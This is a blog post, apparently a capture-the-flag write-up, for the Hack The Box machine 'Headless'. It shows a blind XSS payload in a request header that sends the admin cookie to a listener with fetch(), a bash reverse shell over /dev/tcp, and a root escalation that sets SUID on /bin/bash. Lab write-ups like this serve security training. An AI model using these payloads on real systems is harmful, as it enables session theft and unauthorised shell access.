mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-21 11:53:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity
chirpy-starter/_posts/2024-01-09-headless.md
racc0x 6278b1b310 update-2025
2025-02-03 22:22:27 -06:00

136 lines
3.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: HTB - Headless
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Headless]
tags: [HackTheBox, Python Werkzeug, XSS, User-Agent]
image:
path: /assets/img/post/headless/Headless-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Headless.
---
## Box Info
| Name | Headless |
| :-------------------- | ---------------: |
| Release Date | 23 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -A -Pn 10.10.11.8 -oG allPorts
```
![Image](/assets/img/post/headless/1.png)
[http://10.10.11.8:5000/](http://10.10.11.8:5000/)
![Image](/assets/img/post/headless/2.png)
## Scan Directory
We dont found anything interesting...
![Image](/assets/img/post/headless/3.png)
### BurpSuite
Now go to /support
![Image](/assets/img/post/headless/5.png)
And we try to intercept this with Burpsuite
![Image](/assets/img/post/headless/4.png)
If I try some HTML injection returns the HTTP request content.
![Image](/assets/img/post/headless/attemp.png)
The HTTP `response` headers show its a `Werkzeug / Python server`
**Exploitation**
**Blind XSS on User-Agent**
Try to figerout a large time i found the XSS over header put in a `header-false: a<script>alert(1)</script>`
`<img src=x onerror=fetch('http://<IP>:<PORT>/'+document.cookie);>`
![Image](/assets/img/post/headless/6.png)
**Python Server**
`python -m http.server 8020`
![Image](/assets/img/post/headless/7.png)
![Image](/assets/img/post/headless/8.png)
After Exploit XSS at User-Agent, we get a reply back with the **admin cookie** at the python server
![Image](/assets/img/post/headless/9.png)
[http://10.10.11.8:5000/dashboard](http://10.10.11.8:5000/dashboard)
![Image](/assets/img/post/headless/10.png)
![Image](/assets/img/post/headless/11.png)
**Reverse Shell**
![Image](/assets/img/post/headless/12.png)
```
#!/bin/bash
/bin/bash -c 'exec bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
#Create Reverse Shell script into a file, In my case I create .sh
```
![Image](/assets/img/post/headless/13.png)
![Image](/assets/img/post/headless/14.png)
![Image](/assets/img/post/headless/15.png)
![Image](/assets/img/post/headless/16.png)
**User Flag**
## Privilege Escalation
#### Check sudo -l
![Image](/assets/img/post/headless/17.png)
Syscheck
cat /usr/bin/syscheck:
![Image](/assets/img/post/headless/18.png)
### Exploit [initdb.sh](http://initdb.sh)
`echo "chmod u+s /bin/bash" > initdb.sh chmod +x initdb.sh`
- `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges.
- `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user.
![Image](/assets/img/post/headless/19.png)
```
sudo /usr/bin/syscheck
/bin/bash -p
```
`/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID.
![Image](/assets/img/post/headless/20.png)
**Root Flag**
Reference in New Issue View Git Blame Copy Permalink